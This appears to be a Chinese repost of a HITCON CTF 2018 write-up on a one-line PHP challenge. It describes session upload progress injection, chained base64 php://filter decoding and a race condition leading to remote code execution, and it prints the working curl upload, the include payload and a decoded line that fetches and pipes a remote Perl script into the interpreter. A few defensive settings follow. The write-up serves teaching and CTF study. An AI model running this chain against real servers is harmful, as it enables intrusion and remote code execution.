HITCON CTF 2018 - 单行PHP挑战:会话上传与流过滤器链的极致利用

HITCON CTF 2018 - 单行PHP挑战

这是Orange带来的技术分享 :)

挑战背景

在每年HITCON CTF中,我都会设计至少一个PHP漏洞利用挑战,其特点是源码极其简洁(通常只有几行),但利用难度极高。本次挑战是历年最短的一个------仅含单行PHP代码,运行在默认安装的Ubuntu 18.04 + PHP7.2 + Apache环境。

核心技术点

  1. 会话上传进度控制

    利用session.upload_progress特性(默认启用)向SESSION文件注入可控内容:

    bash 复制代码
    curl http://target/ -H 'Cookie: PHPSESSID=iamorange' \
      -F 'PHP_SESSION_UPLOAD_PROGRESS=payload' -F 'file=@/etc/passwd'
  2. 流过滤器链绕过

    通过多级base64解码过滤器处理前缀污染:

    php 复制代码
    php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/var/lib/php/sessions/sess_iamorange
  3. 竞态条件利用

    对抗session.upload_progress.cleanup的自动清理机制(默认开启),通过快速竞争或大文件上传维持会话。

漏洞利用过程

  1. 构造特殊base64载荷,经过三级解码后生成有效PHP代码:

    php 复制代码
    原始:VVVSM0wyTkhhSGRKUjBKcVpGaEtjMGxIT1hsWlZ6VnVXbE0xTUdSNU9UTk1Na3BxVEc1Q2MyWklRbXhqYlhkblRGZEJOMUI2TkhaTWVUaDJUSGs0ZGt4NU9IWk1lVGgy
    解码后:@<?php `curl orange.tw/w/bc.pl|perl -`;?>/////////////
  2. 结合会话文件包含漏洞实现RCE:

    php 复制代码
    include('php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/var/lib/php/sessions/sess_iamorange');

防御建议

  • 禁用session.upload_progress功能
  • 设置open_basedir限制文件访问范围
  • 对会话文件路径进行随机化处理
相关推荐
PhDTool8 分钟前
重构行业认知:ELN如何重构药物研发合作的信任链
人工智能·重构·信任链
液态不合群11 分钟前
数字化转型改变了什么?从技术底层到业务本质的深度重构
前端·人工智能·低代码·重构
机器人行业研究员15 分钟前
人形机器人走猫步?关节力传感器成就小鹏IRON?
人工智能·机器学习·机器人·人机交互·六维力传感器·关节力传感器
杭州泽沃电子科技有限公司18 分钟前
在线监测系统:农药精细化工的“安全锁”与“效率引擎”
运维·人工智能·科技·物联网·化工
snakecy31 分钟前
自然语言处理(NLP)算法原理与实现--Part 1
人工智能·算法·自然语言处理
富唯智能39 分钟前
移动+协作+视觉=?复合型机器人重新定义智能产线
人工智能·工业机器人·复合机器人
mit6.82443 分钟前
[AI tradingOS] trader_manager.go | API集中控制_handleStartTrader
人工智能·区块链
说私域44 分钟前
开源链动2+1模式AI智能名片S2B2C商城小程序的价值及持续变现能力分析
人工智能·小程序·开源
神秘的猪头1 小时前
Vibe Coding 实战教学:用 Trae 协作开发 Chrome 扩展 “Hulk”
前端·人工智能
Element_南笙1 小时前
吴恩达新课程:Agentic AI(笔记6)
人工智能·笔记